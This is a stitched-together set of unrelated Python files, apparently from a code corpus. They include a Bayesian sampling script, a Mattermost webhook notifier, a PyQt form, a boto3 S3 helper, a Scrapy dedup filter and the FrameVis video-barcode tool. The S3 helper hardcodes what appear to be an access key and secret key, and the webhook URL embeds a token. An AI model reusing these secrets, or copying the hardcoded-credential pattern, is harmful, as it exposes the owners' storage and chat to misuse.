# Laplace prior scale gamma (std = sqrt(2)*gamma)
gamma = 0.1
lam = 1/gamma
def cost(theta, y_aug):
r = resf(theta, y_aug)
return 0.5*np.dot(r.T, r)
# starting point for optimization
u0 = np.random.normal(0, gamma, thetatruth.shape)
# RTO sampling
N_samples = 100
lambdas = lam*np.ones((2*N_modes+1,))
res = rto_l1(f, Jf, y, sigma, lambdas, u0, N_samples)
# extract data
samples_plain = res["samples_plain"]
samples_corrected = res["samples_corrected"]
thetaMAP = res["thetaMAP"]
#plot results
xx = np.arange(0, pi, 0.01)
yy = f_fnc(thetatruth, xx)
plt.figure(1); plt.clf();plt.ion()
for n in range(17):
plt.plot(xx, f_fnc(samples_corrected[np.random.randint(N_samples), :], xx), '0.8')
plt.plot(xx, f_fnc(thetaMAP, xx), 'k')
plt.plot(xx, f_fnc(thetatruth, xx), 'g')
plt.plot(xx, yy, 'g')
plt.plot(xObs, y, 'r.', markersize=10)
for n, pos in enumerate(xObs):
plt.plot(np.array([pos, pos]), np.array([y[n]-2*sigma, y[n]+2*sigma]), 'r', linewidth=2)
plt.figure(2);plt.clf()
for n in range(17):
plt.plot(samples_corrected[np.random.randint(N_samples), :], '0.8', marker=".")
plt.plot(thetaMAP.flatten(), '.k-')
plt.plot(thetatruth.flatten(), '.g-')
plt.show()
"""np.random.seed(1992)
xs_obs = np.concatenate((np.array([0, 0.2, 0.8, pi/2, 1.7, 1.8, 2.4, pi]), np.random.uniform(4, 2*pi, (30,))), axis=0)
N = len(xs_obs)
sigma = 0.2
thetaTruth = np.array([0.5, 1.0, 0, 0.1, 0, 0, 0, 0, -0.3, 0, 0, 0, 0, 0, 0])
N_modes = int((len(thetaTruth)-1)/2)
coeffs_cos = 1/np.arange(1, N_modes+1)#np.ones((N_modes,))
coeffs_sin = 1/np.arange(1, N_modes+1)#np.ones((N_modes,))
def f_fnc(theta, xs):
temp = theta[0]
N_modes = int((len(theta)-1)/2)
for k in range(N_modes):
temp += theta[k+1] * coeffs_cos[k]*np.cos((k+1)*xs)
for k in range(N_modes):
temp += theta[k+N_modes+1] * coeffs_sin[k]*np.sin((k+1)*xs)
return temp
def Jf_fnc(theta, xs):
temp = np.zeros((len(xs),2*N_modes+1))
temp[:, 0] = np.ones((len(xs),))
for k in range(N_modes):
temp[:, k+1] = coeffs_cos[k]*np.cos((k+1)*xs)
for k in range(N_modes):
temp[:, k+N_modes+1] = coeffs_sin[k]*np.sin((k+1)*xs)
return temp
# variants with fixed x in observation points
f = lambda theta: f_fnc(theta, xs_obs)
Jf = lambda theta: Jf_fnc(theta, xs_obs)
xx = np.arange(0, 2*pi, 0.01)
yy = f_fnc(thetaTruth, xx)
y = f_fnc(thetaTruth, xs_obs) + np.random.normal(0, sigma, (len(xs_obs),))
lam = 3
def norm1(theta, lam_val):
return lam_val*np.sum(np.abs(theta))
def FncL1(theta, y, lam_val):
return Misfit(theta, y) + norm1(theta, lam_val)
N_iter = 300
tau = 0.002
val = np.zeros((N_iter,))
thetaOpt = np.zeros((2*N_modes+1,))
# find MAP estimator
misfit = lambda theta: f(theta)-y
def Phi_fnc(theta):
m = misfit(theta)
return 1/(2*sigma**2)*np.dot(m.T, m)
def DPhi_fnc(theta):
return np.dot(Jf(theta).T, misfit(theta))/sigma**2
I_fnc = lambda theta: Phi_fnc(theta) + norm1(theta, lam)
res = FISTA(thetaOpt, I_fnc, Phi_fnc, DPhi_fnc, 2*sigma**2*lam, alpha0=10, eta=0.5, N_iter=500, c=1.0, showDetails=True)
thetaOpt = np.copy(res["sol"])
plt.figure(2)
plt.title("FISTA")
plt.plot(res["Is"])
lambdas = lam*np.ones((2*N_modes+1,))
u0 = np.zeros((2*N_modes+1,))
N_samples = 250
res_rto = rto_l1(f, Jf, y, sigma, lambdas, u0, N_samples)
thetaMAP, samples = res_rto["thetaMAP"], res_rto["samples_corrected"]
print("thetaTruth: I = " + str(I_fnc(thetaTruth)) + " = " + str(Phi_fnc(thetaTruth)) + " (misfit) + " + str(norm1(thetaTruth, lam)) + " (norm)")
print("thetaMAP(sampling): I = " + str(I_fnc(thetaMAP)) + " = " + str(Phi_fnc(thetaMAP)) + " (misfit) + " + str(norm1(thetaMAP, lam)) + " (norm)")
print("thetaOpt(FISTA): I = " + str(I_fnc(thetaOpt)) + " = " + str(Phi_fnc(thetaOpt)) + " (misfit) + " + str(norm1(thetaOpt, lam)) + " (norm)")
plt.figure(3);
for n in range(17):
plt.plot(samples[np.random.randint(N_samples), :], '0.8', marker=".")
plt.plot(thetaMAP, '.k-', label="th_MAP (from sampling)")
plt.plot(thetaTruth, '.g-', label="th_true")
plt.plot(thetaOpt, '.b-', label="th_OPT (from FISTA)")
plt.legend()
plt.figure(1);plt.ion()
plt.plot(xs_obs, y, 'r.', markersize=10, label="obs")
plt.plot(xx, f_fnc(thetaTruth, xx), 'g', label="th_true")
for n in range(17):
plt.plot(xx, f_fnc(samples[np.random.randint(N_samples), :], xx), '0.8')
plt.plot(xx, f_fnc(thetaMAP, xx), 'k', label="th_MAP (from sampling)")
plt.plot(xx, yy, 'g')
plt.plot(xs_obs, y, 'r.', markersize=10)
plt.plot(xx, f_fnc(thetaOpt, xx), 'b', label="th_OPT (from FISTA)")
plt.legend()
plt.show()
"""
|
nilq/baby-python
|
python
|
import requests
import json
def send(text, path):
requests.post('https://meeting.ssafy.com/hooks/k13xxxszfp8z8ewir4qndiw63c',
data=json.dumps({"attachments": [{
"color": "#FF8000",
"text": str(text),
"author_name": "django",
"author_icon": "http://www.mattermost.org/wp-content/uploads/2016/04/icon_WS.png",
"title": path,
}]}),
headers={'Content-Type': 'application/json'}
)
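# Example usage (hypothetical message text and path shown):
# send("Deployment finished", "/api/deploy/")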
|
nilq/baby-python
|
python
|
#-*- coding: utf-8 -*-
import datetime
from PyQt4 import QtGui
from campos import CampoNum, CampoCad
from controllers.orden_controller import initData, translateView, updateData, checkValidacion, Save
class OrdenView(QtGui.QGroupBox):
def __init__(self, parent=None):
super(OrdenView, self).__init__(parent)
self.label_numero = QtGui.QLabel(self)
self.text_numero = CampoNum(self, u"Número de orden")
self.label_fecha = QtGui.QLabel(self)
self.date_fecha = QtGui.QDateEdit(self)
self.label_bien_servicio = QtGui.QLabel(self)
self.text_bien_servicio = CampoNum(self, u"Bien/servicio")
self.label_rubro = QtGui.QLabel(self)
self.text_rubro = CampoCad(self, u"Rubro")
self.fila_orden = QtGui.QHBoxLayout()
self.fila_orden.addWidget(self.label_numero)
self.fila_orden.addWidget(self.text_numero)
self.fila_orden.addWidget(self.label_fecha)
self.fila_orden.addWidget(self.date_fecha)
self.fila_orden.addWidget(self.label_bien_servicio)
self.fila_orden.addWidget(self.text_bien_servicio)
self.fila_orden.addWidget(self.label_rubro)
self.fila_orden.addWidget(self.text_rubro)
self.setLayout(self.fila_orden)
self.translate_view()
init_data = initData
translate_view = translateView
update_data = updateData
check_validacion = checkValidacion
save = Save
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
from distutils.core import setup
import os
os.system("make ")
setup(name='pi',
version='1.0',
description='pi digits compute',
author='mathm',
author_email='mingtinglai@58.com',
url="https://igit.58corp.com/mingtinglai/pi",
)
|
nilq/baby-python
|
python
|
import os
import sys
import threading
import boto3
import logging
import shutil
from botocore.client import Config
from matplotlib import pyplot as plt
from botocore.exceptions import ClientError
from boto3.s3.transfer import TransferConfig
END_POINT_URL = 'http://uvo1baooraa1xb575uc.vm.cld.sr/'
A_KEY = 'AKIAtEpiGWUcQIelPRlD1Pi6xQ'
S_KEY = 'YNV6xS8lXnCTGSy1x2vGkmGnmdJbZSapNXaSaRhK'
class ProgressPercentage(object):
def __init__(self, filename):
self._filename = filename
self._size = float(os.path.getsize(filename))
self._seen_so_far = 0
self._lock = threading.Lock()
def __call__(self, bytes_amount):
# To simplify, assume this is hooked up to a single filename
with self._lock:
self._seen_so_far += bytes_amount
percentage = (self._seen_so_far / self._size) * 100
sys.stdout.write("\r%s %s / %s (%.2f%%)" %
(self._filename, self._seen_so_far,
self._size, percentage))
sys.stdout.flush()
"""Functions for buckets operation"""
def create_bucket_op(bucket_name, region):
if region is None:
s3_client.create_bucket(Bucket=bucket_name)
else:
location = {'LocationConstraint': region}
s3_client.create_bucket(Bucket=bucket_name,
CreateBucketConfiguration=location)
def list_bucket_op(bucket_name, region, operation):
buckets = s3_client.list_buckets()
if buckets['Buckets']:
for bucket in buckets['Buckets']:
print(bucket)
return True
else:
        logging.error('No buckets found for this account')
return False
def bucket_operation(bucket_name, region=None, operation='list'):
try:
if operation == 'delete':
s3_client.delete_bucket(Bucket=bucket_name)
elif operation == 'create':
create_bucket_op(bucket_name, region)
elif operation == 'list':
return list_bucket_op(bucket_name, region, operation)
else:
logging.error('unknown bucket operation')
return False
except ClientError as e:
logging.error(e)
return False
return True
def upload_download_op_file(bucket_name, file_name, file_location,
region, operation):
if not file_location:
        logging.error('The file location %s is missing for %s operation!'
                      % (file_location, operation))
return False
if operation == 'download':
s3_resource.Bucket(bucket_name).download_file(file_name, file_location)
    elif operation == 'upload':
        # upload_file does not accept CreateBucketConfiguration; a bucket's
        # region is fixed at creation time, so it is not passed here
        s3_resource.Bucket(bucket_name).upload_file(file_location, file_name)
return True
"""Functions for files operation"""
def list_op_file(bucket_name):
current_bucket = s3_resource.Bucket(bucket_name)
print('The files in bucket %s:\n' % (bucket_name))
for obj in current_bucket.objects.all():
print(obj.meta.data)
return True
def delete_op_file(bucket_name, file_name, operation):
if not file_name:
        logging.error('The file name %s is missing for %s operation!'
                      % (file_name, operation))
return False
s3_client.delete_object(Bucket=bucket_name, Key=file_name)
return True
def file_operation(bucket_name=None, file_name=None, file_location=None,
region=None, operation='list'):
if not bucket_name:
logging.error('The bucket name is %s missing!' % (bucket_name))
return False
try:
if operation == 'list':
return list_op_file(bucket_name)
elif operation == 'delete':
return delete_op_file(bucket_name, file_name, operation)
elif operation == 'upload' or operation == 'download':
return upload_download_op_file(bucket_name, file_name,
file_location, region, operation)
else:
logging.error('unknown file operation')
return False
except ClientError as e:
logging.error(e)
return False
return True
s3_resource = boto3.resource('s3', endpoint_url=END_POINT_URL,
aws_access_key_id=A_KEY,
aws_secret_access_key=S_KEY,
config=Config(signature_version='s3v4'),
region_name='US')
s3_client = boto3.client('s3', endpoint_url=END_POINT_URL,
aws_access_key_id=A_KEY,
aws_secret_access_key=S_KEY,
config=Config(signature_version='s3v4'),
region_name='US')
bucket_name = 'detection'
file_name = r'0_5.txt'
# path_file_upload = r'C:\PycharmProjects\cortxHackton\upload\0_5.txt'
# assert os.path.isfile(path_file_upload)
# with open(path_file_upload, "r") as f:
# pass
path_file_download = r'download\0_5.txt'
path_save = ''
if bucket_operation(bucket_name, None, 'list'):
print("Bucket creation completed successfully!")
#
# if file_operation(bucket_name, file_name, path_file_upload, None, 'upload'):
# print("Uploading file to S3 completed successfully!")
if file_operation(bucket_name, file_name, path_file_download, None, 'download'):
print("Downloading the file to S3 has been completed successfully!")
# if file_operation(bucket_name, file_name, path_file_download, None, 'delete'):
# print("Downloading the file to S3 has been completed successfully!")
# zip_point = ''
# shutil.make_archive(zip_point, 'zip', path_save)
# if file_operation(bucket_name, '.json', path_save + '.json', None, 'upload'):
# print("Uploading file to S3 completed successfully!")
|
nilq/baby-python
|
python
|
#coding:utf-8
import hashlib
from scrapy.dupefilters import RFPDupeFilter
from scrapy.utils.url import canonicalize_url
class URLSha1Filter(RFPDupeFilter):
"""根据urlsha1过滤"""
def __init__(self, path=None, debug=False):
self.urls_seen = set()
RFPDupeFilter.__init__(self, path)
def request_seen(self, request):
fp = hashlib.sha1()
        fp.update(canonicalize_url(request.url).encode('utf-8'))  # hashlib requires bytes
url_sha1 = fp.hexdigest()
if url_sha1 in self.urls_seen:
return True
else:
self.urls_seen.add(url_sha1)
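# To enable this filter, point Scrapy at it in settings.py. The module path
# below is an assumption; adjust it to wherever this class actually lives:
# DUPEFILTER_CLASS = 'myproject.dupefilters.URLSha1Filter'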
|
nilq/baby-python
|
python
|
from sys import *
# Optional first command-line argument selects the RNG seed (defaults to 11).
sid = 11 if len(argv) <= 1 else int(argv[1])
from random import *
seed(sid)
for cas in range(int(input())):
    input()  # skip the element count; the values themselves are on the next line
    m = {}
    # Map each distinct value to the list of positions where it occurs.
    for i, v in enumerate(map(int, input().split())): m.setdefault(v, []).append(i)
    # Pick one random occurrence per value, then order the values by that position.
    b = [v for i, v in sorted((choice(l), v) for v, l in m.items())]
    print(len(b))
    print(*b)
|
nilq/baby-python
|
python
|
#
# Project FrameVis - Video Frame Visualizer Script
# @author David Madison
# @link github.com/dmadison/FrameVis
# @version v1.0.1
# @license MIT - Copyright (c) 2019 David Madison
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import cv2
import numpy as np
import argparse
from enum import Enum, auto
import time
class FrameVis:
"""
Reads a video file and outputs an image comprised of n resized frames, spread evenly throughout the file.
"""
default_frame_height = None # auto, or in pixels
default_frame_width = None # auto, or in pixels
default_concat_size = 1 # size of concatenated frame if automatically calculated, in pixels
default_direction = "horizontal" # left to right
def visualize(self, source, nframes, height=default_frame_height, width=default_frame_width, \
direction=default_direction, trim=False, quiet=True):
"""
Reads a video file and outputs an image comprised of n resized frames, spread evenly throughout the file.
Parameters:
source (str): filepath to source video file
nframes (int): number of frames to process from the video
height (int): height of each frame, in pixels
width (int): width of each frame, in pixels
direction (str): direction to concatenate frames ("horizontal" or "vertical")
quiet (bool): suppress console messages
Returns:
visualization image as numpy array
"""
video = cv2.VideoCapture(source) # open video file
if not video.isOpened():
raise FileNotFoundError("Source Video Not Found")
if not quiet:
print("") # create space from script call line
# calculate keyframe interval
video_total_frames = video.get(cv2.CAP_PROP_FRAME_COUNT) # retrieve total frame count from metadata
if not isinstance(nframes, int) or nframes < 1:
raise ValueError("Number of frames must be a positive integer")
elif nframes > video_total_frames:
raise ValueError("Requested frame count larger than total available ({})".format(video_total_frames))
keyframe_interval = video_total_frames / nframes # calculate number of frames between captures
# grab frame for dimension calculations
success,image = video.read() # get first frame
if not success:
raise IOError("Cannot read from video file")
# calculate letterbox / pillarbox trimming, if specified
matte_type = 0
if trim == True:
if not quiet:
print("Trimming enabled, checking matting... ", end="", flush=True)
# 10 frame samples, seen as matted if an axis has all color channels at 3 / 255 or lower (avg)
success, cropping_bounds = MatteTrimmer.determine_video_bounds(source, 10, 3)
matte_type = 0
if success: # only calculate cropping if bounds are valid
crop_width = cropping_bounds[1][0] - cropping_bounds[0][0] + 1
crop_height = cropping_bounds[1][1] - cropping_bounds[0][1] + 1
if crop_height != image.shape[0]: # letterboxing
matte_type += 1
if crop_width != image.shape[1]: # pillarboxing
matte_type +=2
if not quiet:
if matte_type == 0:
print("no matting detected")
elif matte_type == 1:
print("letterboxing detected, cropping {} px from the top and bottom".format(int((image.shape[0] - crop_height) / 2)))
elif matte_type == 2:
print("pillarboxing detected, trimming {} px from the sides".format(int((image.shape[1] - crop_width) / 2)))
elif matte_type == 3:
print("multiple matting detected - cropping ({}, {}) to ({}, {})".format(image.shape[1], image.shape[0], crop_width, crop_height))
# calculate height
if height is None: # auto-calculate
if direction == "horizontal": # non-concat, use video size
if matte_type & 1 == 1: # letterboxing present
height = crop_height
else:
height = image.shape[0] # save frame height
else: # concat, use default value
height = FrameVis.default_concat_size
elif not isinstance(height, int) or height < 1:
raise ValueError("Frame height must be a positive integer")
# calculate width
if width is None: # auto-calculate
if direction == "vertical": # non-concat, use video size
if matte_type & 2 == 2: # pillarboxing present
width = crop_width
else:
width = image.shape[1] # save frame width
else: # concat, use default value
width = FrameVis.default_concat_size
elif not isinstance(width, int) or width < 1:
raise ValueError("Frame width must be a positive integer")
# assign direction function and calculate output size
if direction == "horizontal":
concatenate = cv2.hconcat
output_width = width * nframes
output_height = height
elif direction == "vertical":
concatenate = cv2.vconcat
output_width = width
output_height = height * nframes
else:
raise ValueError("Invalid direction specified")
if not quiet:
aspect_ratio = output_width / output_height
print("Visualizing \"{}\" - {} by {} ({:.2f}), from {} frames (every {:.2f} seconds)"\
.format(source, output_width, output_height, aspect_ratio, nframes, FrameVis.interval_from_nframes(source, nframes)))
# set up for the frame processing loop
next_keyframe = keyframe_interval / 2 # frame number for the next frame grab, starting evenly offset from start/end
finished_frames = 0 # counter for number of processed frames
output_image = None
progress = ProgressBar("Processing:")
while True:
if finished_frames == nframes:
break # done!
video.set(cv2.CAP_PROP_POS_FRAMES, int(next_keyframe)) # move cursor to next sampled frame
success,image = video.read() # read the next frame
if not success:
raise IOError("Cannot read from video file (frame {} out of {})".format(int(next_keyframe), video_total_frames))
if matte_type != 0: # crop out matting, if specified and matting is present
image = MatteTrimmer.crop_image(image, cropping_bounds)
image = cv2.resize(image, (width, height)) # resize to output size
# save to output image
if output_image is None:
output_image = image
else:
				output_image = concatenate([output_image, image])	# append the new frame in the configured direction
finished_frames += 1
next_keyframe += keyframe_interval # set next frame capture time, maintaining floats
if not quiet:
progress.write(finished_frames / nframes) # print progress bar to the console
video.release() # close video capture
return output_image
@staticmethod
def average_image(image, direction):
"""
Averages the colors in an axis across an entire image
Parameters:
image (arr x.y.c): image as 3-dimensional numpy array
direction (str): direction to average frames ("horizontal" or "vertical")
Returns:
image, with pixel data averaged along provided axis
"""
height, width, depth = image.shape
if direction == "horizontal":
scale_height = 1
scale_width = width
elif direction == "vertical":
scale_height = height
scale_width = 1
else:
raise ValueError("Invalid direction specified")
image = cv2.resize(image, (scale_width, scale_height)) # scale down to '1', averaging values
image = cv2.resize(image, (width, height)) # scale back up to size
return image
@staticmethod
def motion_blur(image, direction, blur_amount):
"""
Blurs the pixels in a given axis across an entire image.
Parameters:
image (arr x.y.c): image as 3-dimensional numpy array
direction (str): direction of stacked images for blurring ("horizontal" or "vertical")
blur_amount (int): how much to blur the image, as the convolution kernel size
Returns:
image, with pixel data blurred along provided axis
"""
kernel = np.zeros((blur_amount, blur_amount)) # create convolution kernel
# fill group with '1's
if direction == "horizontal":
kernel[:, int((blur_amount - 1)/2)] = np.ones(blur_amount) # fill center column (blurring vertically for horizontal concat)
elif direction == "vertical":
kernel[int((blur_amount - 1)/2), :] = np.ones(blur_amount) # fill center row (blurring horizontally for vertical concat)
else:
raise ValueError("Invalid direction specified")
kernel /= blur_amount # normalize kernel matrix
return cv2.filter2D(image, -1, kernel) # filter using kernel with same depth as source
@staticmethod
def nframes_from_interval(source, interval):
"""
Calculates the number of frames available in a video file for a given capture interval
Parameters:
source (str): filepath to source video file
interval (float): capture frame every i seconds
Returns:
number of frames per time interval (int)
"""
video = cv2.VideoCapture(source) # open video file
if not video.isOpened():
raise FileNotFoundError("Source Video Not Found")
frame_count = video.get(cv2.CAP_PROP_FRAME_COUNT) # total number of frames
fps = video.get(cv2.CAP_PROP_FPS) # framerate of the video
duration = frame_count / fps # duration of the video, in seconds
video.release() # close video capture
return int(round(duration / interval)) # number of frames per interval
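	# Worked example (illustrative numbers): a 300-second video sampled every
	# 1.5 seconds yields int(round(300 / 1.5)) = 200 frames.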
@staticmethod
def interval_from_nframes(source, nframes):
"""
Calculates the capture interval, in seconds, for a video file given the
number of frames to capture
Parameters:
source (str): filepath to source video file
nframes (int): number of frames to capture from the video file
Returns:
time interval (seconds) between frame captures (float)
"""
video = cv2.VideoCapture(source) # open video file
if not video.isOpened():
raise FileNotFoundError("Source Video Not Found")
frame_count = video.get(cv2.CAP_PROP_FRAME_COUNT) # total number of frames
fps = video.get(cv2.CAP_PROP_FPS) # framerate of the video
keyframe_interval = frame_count / nframes # calculate number of frames between captures
video.release() # close video capture
return keyframe_interval / fps # seconds between captures
class MatteTrimmer:
"""
Functions for finding and removing black mattes around video frames
"""
@staticmethod
def find_matrix_edges(matrix, threshold):
"""
Finds the start and end points of a 1D array above a given threshold
Parameters:
matrix (arr, 1.x): 1D array of data to check
threshold (value): valid data is above this trigger level
Returns:
tuple with the array indices of data bounds, start and end
"""
        matrix = np.asarray(matrix)  # accept lists/tuples as well as numpy arrays
        if matrix.ndim != 1:
            raise ValueError("Provided matrix is not the right size (must be 1D)")
data_start = None
data_end = None
for value_id, value in enumerate(matrix):
if value > threshold:
if data_start is None:
data_start = value_id
data_end = value_id
return (data_start, data_end)
@staticmethod
def find_larger_bound(first, second):
"""
Takes two sets of diagonal rectangular boundary coordinates and determines
the set of rectangular boundary coordinates that contains both
Parameters:
first (arr, 1.2.2): pair of rectangular coordinates, in the form [(X,Y), (X,Y)]
second (arr, 1.2.2): pair of rectangular coordinates, in the form [(X,Y), (X,Y)]
Where for both arrays the first coordinate is in the top left-hand corner,
and the second coordinate is in the bottom right-hand corner.
Returns:
numpy coordinate matrix containing both of the provided boundaries
"""
left_edge = first[0][0] if first[0][0] <= second[0][0] else second[0][0]
right_edge = first[1][0] if first[1][0] >= second[1][0] else second[1][0]
top_edge = first[0][1] if first[0][1] <= second[0][1] else second[0][1]
bottom_edge = first[1][1] if first[1][1] >= second[1][1] else second[1][1]
return np.array([[left_edge, top_edge], [right_edge, bottom_edge]])
@staticmethod
def valid_bounds(bounds):
"""
Checks if the frame bounds are a valid format
Parameters:
bounds (arr, 1.2.2): pair of rectangular coordinates, in the form [(X,Y), (X,Y)]
Returns:
True or False
"""
        for x, x_coordinate in enumerate(bounds):
            for y, y_coordinate in enumerate(x_coordinate):
                if y_coordinate is None:
                    return False # missing coordinate value
if bounds[0][0] > bounds[1][0] or \
bounds[0][1] > bounds[1][1]:
return False # left > right or top > bottom
return True
@staticmethod
def determine_image_bounds(image, threshold):
"""
Determines if there are any hard mattes (black bars) surrounding
an image on either the top (letterboxing) or the sides (pillarboxing)
Parameters:
image (arr, x.y.c): image as 3-dimensional numpy array
threshold (8-bit int): min color channel value to judge as 'image present'
Returns:
success (bool): True or False if the bounds are valid
image_bounds: numpy coordinate matrix with the two opposite corners of the
image bounds, in the form [(X,Y), (X,Y)]
"""
height, width, depth = image.shape
# check for letterboxing
horizontal_sums = np.sum(image, axis=(1,2)) # sum all color channels across all rows
        hthreshold = (threshold * width * depth) # a row counts as matte only if its sum stays below the equivalent of every pixel having a value of "threshold" in every channel
vertical_edges = MatteTrimmer.find_matrix_edges(horizontal_sums, hthreshold)
# check for pillarboxing
vertical_sums = np.sum(image, axis=(0,2)) # sum all color channels across all columns
        vthreshold = (threshold * height * depth) # a column counts as matte only if its sum stays below the equivalent of every pixel having a value of "threshold" in every channel
horizontal_edges = MatteTrimmer.find_matrix_edges(vertical_sums, vthreshold)
image_bounds = np.array([[horizontal_edges[0], vertical_edges[0]], [horizontal_edges[1], vertical_edges[1]]])
return MatteTrimmer.valid_bounds(image_bounds), image_bounds
@staticmethod
def determine_video_bounds(source, nsamples, threshold):
"""
Determines if any matting exists in a video source
Parameters:
source (str): filepath to source video file
nsamples (int): number of frames from the video to determine bounds,
evenly spaced throughout the video
threshold (8-bit int): min color channel value to judge as 'image present'
Returns:
success (bool): True or False if the bounds are valid
video_bounds: numpy coordinate matrix with the two opposite corners of the
video bounds, in the form [(X,Y), (X,Y)]
"""
video = cv2.VideoCapture(source) # open video file
if not video.isOpened():
raise FileNotFoundError("Source Video Not Found")
video_total_frames = video.get(cv2.CAP_PROP_FRAME_COUNT) # retrieve total frame count from metadata
if not isinstance(nsamples, int) or nsamples < 1:
raise ValueError("Number of samples must be a positive integer")
keyframe_interval = video_total_frames / nsamples # calculate number of frames between captures
# open video to make results consistent with visualizer
# (this also GREATLY increases the read speed? no idea why)
success,image = video.read() # get first frame
if not success:
raise IOError("Cannot read from video file")
next_keyframe = keyframe_interval / 2 # frame number for the next frame grab, starting evenly offset from start/end
video_bounds = None
for frame_number in range(nsamples):
video.set(cv2.CAP_PROP_POS_FRAMES, int(next_keyframe)) # move cursor to next sampled frame
success,image = video.read() # read the next frame
if not success:
raise IOError("Cannot read from video file")
success, frame_bounds = MatteTrimmer.determine_image_bounds(image, threshold)
if not success:
continue # don't compare bounds, frame bounds are invalid
video_bounds = frame_bounds if video_bounds is None else MatteTrimmer.find_larger_bound(video_bounds, frame_bounds)
next_keyframe += keyframe_interval # set next frame capture time, maintaining floats
video.release() # close video capture
return MatteTrimmer.valid_bounds(video_bounds), video_bounds
@staticmethod
def crop_image(image, bounds):
"""
Crops a provided image by the coordinate bounds pair provided.
Parameters:
image (arr, x.y.c): image as 3-dimensional numpy array
        bounds (arr, 1.2.2): pair of rectangular coordinates, in the form [(X,Y), (X,Y)]
Returns:
image as 3-dimensional numpy array, cropped to the coordinate bounds
"""
return image[bounds[0][1]:bounds[1][1], bounds[0][0]:bounds[1][0]]
class ProgressBar:
"""
Generates a progress bar for the console output
Args:
pre (str): string to prepend before the progress bar
bar_length (int): length of the progress bar itself, in characters
print_elapsed (bool): option to print time elapsed or not
Attributes:
pre (str): string to prepend before the progress bar
bar_length (int): length of the progress bar itself, in characters
        print_elapsed (bool): option to print time elapsed or not
        __start_time (float): starting time for the progress bar, in unix seconds
"""
def __init__(self, pre="", bar_length=25, print_elapsed=True):
pre = (pre + '\t') if pre != "" else pre # append separator if string present
self.pre = pre
self.bar_length = bar_length
self.print_elapsed = print_elapsed
if self.print_elapsed:
self.__start_time = time.time() # store start time as unix
def write(self, percent):
"""Prints a progress bar to the console based on the input percentage (float)."""
term_char = '\r' if percent < 1.0 else '\n' # rewrite the line unless finished
filled_size = int(round(self.bar_length * percent)) # number of 'filled' characters in the bar
progress_bar = "#" * filled_size + " " * (self.bar_length - filled_size) # progress bar characters, as a string
time_string = ""
if self.print_elapsed:
time_elapsed = time.time() - self.__start_time
time_string = "\tTime Elapsed: {}".format(time.strftime("%H:%M:%S", time.gmtime(time_elapsed)))
print("{}[{}]\t{:.2%}{}".format(self.pre, progress_bar, percent, time_string), end=term_char, flush=True)
def main():
parser = argparse.ArgumentParser(description="video frame visualizer and movie barcode generator", add_help=False) # removing help so I can use '-h' for height
parser.add_argument("source", help="file path for the video file to be visualized", type=str)
parser.add_argument("destination", help="file path output for the final image", type=str)
parser.add_argument("-n", "--nframes", help="the number of frames in the visualization", type=int)
parser.add_argument("-i", "--interval", help="interval between frames for the visualization", type=float)
parser.add_argument("-h", "--height", help="the height of each frame, in pixels", type=int, default=FrameVis.default_frame_height)
parser.add_argument("-w", "--width", help="the output width of each frame, in pixels", type=int, default=FrameVis.default_frame_width)
parser.add_argument("-d", "--direction", help="direction to concatenate frames, horizontal or vertical", type=str, \
choices=["horizontal", "vertical"], default=FrameVis.default_direction)
parser.add_argument("-t", "--trim", help="detect and trim any hard matting (letterboxing or pillarboxing)", action='store_true', default=False)
parser.add_argument("-a", "--average", help="average colors for each frame", action='store_true', default=False)
parser.add_argument("-b", "--blur", help="apply motion blur to the frames (kernel size)", type=int, nargs='?', const=100, default=0)
parser.add_argument("-q", "--quiet", help="mute console outputs", action='store_true', default=False)
parser.add_argument("--help", action="help", help="show this help message and exit")
args = parser.parse_args()
# check number of frames arguments
if args.nframes is None:
if args.interval is not None: # calculate nframes from interval
args.nframes = FrameVis.nframes_from_interval(args.source, args.interval)
else:
parser.error("You must provide either an --(n)frames or --(i)nterval argument")
# check postprocessing arguments
if args.average is True and args.blur != 0:
parser.error("Cannot (a)verage and (b)lur, you must choose one or the other")
fv = FrameVis()
output_image = fv.visualize(args.source, args.nframes, height=args.height, width=args.width, \
direction=args.direction, trim=args.trim, quiet=args.quiet)
# postprocess
if args.average or args.blur != 0:
if args.average:
if not args.quiet:
print("Averaging frame colors... ", end="", flush=True)
output_image = fv.average_image(output_image, args.direction)
if args.blur != 0:
if not args.quiet:
print("Adding motion blur to final frame... ", end="", flush=True)
output_image = fv.motion_blur(output_image, args.direction, args.blur)
if not args.quiet:
print("done")
cv2.imwrite(args.destination, output_image) # save visualization to file
if not args.quiet:
print("Visualization saved to {}".format(args.destination))
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
import os
import pickle
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from task_dyva.utils import save_figure
from task_dyva.visualization import PlotModelLatents
class FigureS6():
"""Analysis methods and plotting routines to reproduce
Figure S6 from the manuscript (example latent state trajectories).
"""
analysis_dir = 'model_analysis'
stats_fn = 'holdout_outputs_01SD.pkl'
fp_fn = 'fixed_points.pkl'
age_bins = ['ages20to29', 'ages30to39', 'ages40to49',
'ages50to59', 'ages60to69', 'ages70to79', 'ages80to89']
plot_age_bins = ['ages20to29', 'ages50to59', 'ages80to89']
plot_titles = ['Ages 20 to 29', 'Ages 50 to 59', 'Ages 80 to 89']
figsize = (9, 13)
figdpi = 300
def __init__(self, model_dir, save_dir, metadata):
self.model_dir = model_dir
self.save_dir = save_dir
self.expts = metadata['name']
self.age_bins = metadata['age_range']
self.sc_status = metadata['switch_cost_type']
# Containers for summary stats
self.all_stats = {ab: [] for ab in self.age_bins}
self.all_fps = {ab: [] for ab in self.age_bins}
def make_figure(self):
